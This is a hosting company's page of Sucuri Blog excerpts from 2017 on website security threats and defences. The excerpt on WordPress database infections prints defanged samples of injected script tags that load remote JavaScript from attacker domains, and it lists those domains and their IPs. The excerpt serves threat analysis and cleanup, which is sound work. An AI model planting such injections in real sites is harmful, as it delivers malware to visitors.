Call Us Today at 1-403-291-9811 or 1-866-291-3857

Web Security

  • Hacked Websites Mine Cryptocurrencies 22 September 2017 Hacked Websites Mine Cryptocurrencies

    Cryptocurrencies are all the rage now. Bitcoin, altcoins, blockchain, ICO, mining farms, skyrocketing exchange rates – you see or hear this everyday in news now. Everyone seems to be trying to jump on this bandwagon.

    This trend resulted in emergence of online platforms that allow webmasters to install coin miners into their websites as an alternative means of monetization. The most notable platforms that provide JavaScript cryptocurrency miners for web sites are JSE Coin and Coinhive .

    Continue reading Hacked Websites Mine Cryptocurrencies at Sucuri Blog.

  • Ecommerce Security: Fake Jquery Used as CC Scraper 21 September 2017 Ecommerce Security: Fake Jquery Used as CC Scraper

    In the last few months, we noticed an increase in attacks targeting ecommerce platforms aiming to steal credit card information. We saw a similar rise last year after the summer ended, and believe that trend will continue now that the holiday season is quickly approaching.

    Most of these attacks are based on intercepting the communication between the online store and the payment gateway (the checkout process) in order to send valuable information to the attacker.

    Continue reading Ecommerce Security: Fake Jquery Used as CC Scraper at Sucuri Blog.

  • Using a VeraCrypt File Container to Encrypt Local Website Files 19 September 2017 Using a VeraCrypt File Container to Encrypt Local Website Files

    If you are doing website development and have a local repository, or store website backups on your computer, you should strongly consider encrypting these sensitive files.

    In the event that your computer is compromised, the encrypted container prevents an attacker from gaining access to your website (via database configuration files) and other private data.

    This guide shows you how to install and use VeraCrypt – a free, open-source encryption tool that works on all operating systems, previously known as TrueCrypt.

    Continue reading Using a VeraCrypt File Container to Encrypt Local Website Files at Sucuri Blog.

  • Malicious Backdoors: Fake Images and Strrev Functions 15 September 2017 Malicious Backdoors: Fake Images and Strrev Functions

    When a website is compromised, attackers frequently leave behind a backdoor – according to our research around 70% of all website hacks include a backdoor. These backdoors are not designed to attack a website or destroy data, instead, they allow an attacker to re-enter a targeted website with little to no authentication, providing them with unauthorized access to the system.

    Backdoors can be planted anywhere within a site, file system, or database.

    Continue reading Malicious Backdoors: Fake Images and Strrev Functions at Sucuri Blog.

  • Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data 13 September 2017 Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

    Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).

    The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.

    Typical injected scripts look like this:

    <s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js'></script>

    Or:

    <s cript type="text/javascript">var t = document.createElement("script");
    t.type = "text/javascript"; t.src = "hxxps://src[.]dancewithme[.]biz/src.js";
    document.head.appendChild(t);</script>

    Or:

    The most noticeable malicious URLs that we’ve seen lately are:

    • con1.sometimesfree[.]biz/c.js (185.82.217.166 Bulgaria)
    • java.sometimesfree[.]biz/counter.js (185.82.217.166 Bulgaria)
    • javascript.sometimesfree[.]biz/script.js (185.82.217.166 Bulgaria)
    • js.givemealetter[.]biz/script.js (185.82.217.166 Bulgaria)
    • go.givemealetter[.]biz/click.html (185.82.217.166 Bulgaria)
    • traffictrade[.]life/scripts.js (200.7.105.43 United Kingdom)
    • blue.traffictrade[.]life/main.js (200.7.105.43 United Kingdom)
    • js.trysomethingnew[.]eu/analytics.js (94.156.144.19 Bulgaria)
    • get.simplefunsite[.]info/rw.js (won’t resolve atm)
    • post.simplefunsite[.]info/go.php?rewrite=81 (won’t resolve atm)
    • src.dancewithme[.]biz/src.js (185.159.82.2 – Russia)
    • go.dancewithme[.]biz/red.php (185.159.82.2 – Russia)
    • mp.trymynewspirit[.]com/s.js (94.156.189.62 Bulgaria)

    They are all new domains registered specifically for this attack:

    • traffictrade[.]life – created on July 3rd, 2017
    • trysomethingnew[.]eu – created on Aug 11th, 2017
    • sometimesfree[.]biz – created on August 22nd, 2017
    • givemealetter[.]biz – created on August 27th, 2017
    • simplefunsite.info – created on September 2nd, 2017
    • dancewithme[.]biz – created on September 5th, 2017
    • trymynewspirit[.]com – created on September 18th, 2017

    Malware in WordPress Database

    In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!

    Continue reading Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data at Sucuri Blog.

  • New Guide on How to Implement HTTPS / SSL Certificate 11 September 2017 New Guide on How to Implement HTTPS / SSL Certificate

    HTTPS is a hot topic among online marketers and SEO professionals who understand the future of the web needs to be more secure. Not just for the good of the internet, but to increase visibility and lower the chances of being penalized.

    Search engines and web traffic authorities are ramping up efforts to encourage website owners to learn how to implement SSL certificates. We just recently wrote about how Google Chrome will be showing warnings on HTTP websites in October if they contain user input fields (login, contact forms, search bars, etc.).

    Continue reading New Guide on How to Implement HTTPS / SSL Certificate at Sucuri Blog.

  • Creating a Basic Website Security Framework 8 September 2017 Creating a Basic Website Security Framework

    When you build or remodel a house, construction workers create a strong framework that can withstand the elements to keep your home and possessions secure. But what happens if you ignore proper building codes and inspections? The resulting risks to health and security are unacceptable.

    The same concept applies to how you secure your websites and the environments they reside in. You have to start with a blueprint that prioritizes security through regular maintenance.

    Continue reading Creating a Basic Website Security Framework at Sucuri Blog.

  • Affiliate Cookie Stuffing in iFrames 5 September 2017 Affiliate Cookie Stuffing in iFrames

    Inline frames (iFrames) are an easy way to embed content from another site onto your own. This element allows you to insert another document inside an HTML page and can be really useful for embedding interactive applications like Google maps, advertisements and ecommerce applications.

    iFrame elements are also popular with website attackers because it allows them to easily load malicious content from their own servers.

    Attackers often use this feature to insert malicious content into compromised sites for the purpose of spam redirection, phishing, and distributing malware.

    Continue reading Affiliate Cookie Stuffing in iFrames at Sucuri Blog.

  • Intro to Securing an Online Store 1 September 2017 Intro to Securing an Online Store

    Ecommerce websites have one of the most difficult challenges in the web security space – keeping the implicit trust of a customer in order to make them feel safe shopping on the site.

    Whether the business started as a local brick-and-mortar shop, or deployed online from the start, it’s easy to design a website and organize content. It’s not as easy knowing how to design a security framework for ecommerce.

    In this post we’ll introduce some basic security concepts and how to think about security for your online store.

    Continue reading Intro to Securing an Online Store at Sucuri Blog.

  • Mining Adminers – Hackers Scan the Internet For DB Scripts 30 August 2017 Mining Adminers – Hackers Scan the Internet For DB Scripts

    Hackers are constantly scanning the internet for exploitable sites, which is why even small, new sites should be fully patched and protected. At the same time, it is not feasible to scan the whole internet with 330+ million domains and billions of web pages. Even Google can’t do it, but hackers are always getting better at reconnaissance.

    Despite these limitations, scanning just 1% of the internet allows attackers to discover thousands of vulnerable sites.

    Continue reading Mining Adminers – Hackers Scan the Internet For DB Scripts at Sucuri Blog.

  • Google Warnings For Form Input Over HTTP Coming in October 28 August 2017 Google Warnings For Form Input Over HTTP Coming in October

    For years, Google has been actively seeking ways to encourage website owners to implement SSL certificates. SSL allows websites to be accessed over HTTPS, which encrypts information sent between the visitor and web server.

    Recently, we discussed how Google is moving from a reward system to a punitive one. Websites using SSL continue to get an SEO boost since it became a confirmed ranking signal in 2014, but we noticed a few months ago that Google was blacklisting non-HTTPS websites that allowed password fields and credit card forms to be filled.

    Continue reading Google Warnings For Form Input Over HTTP Coming in October at Sucuri Blog.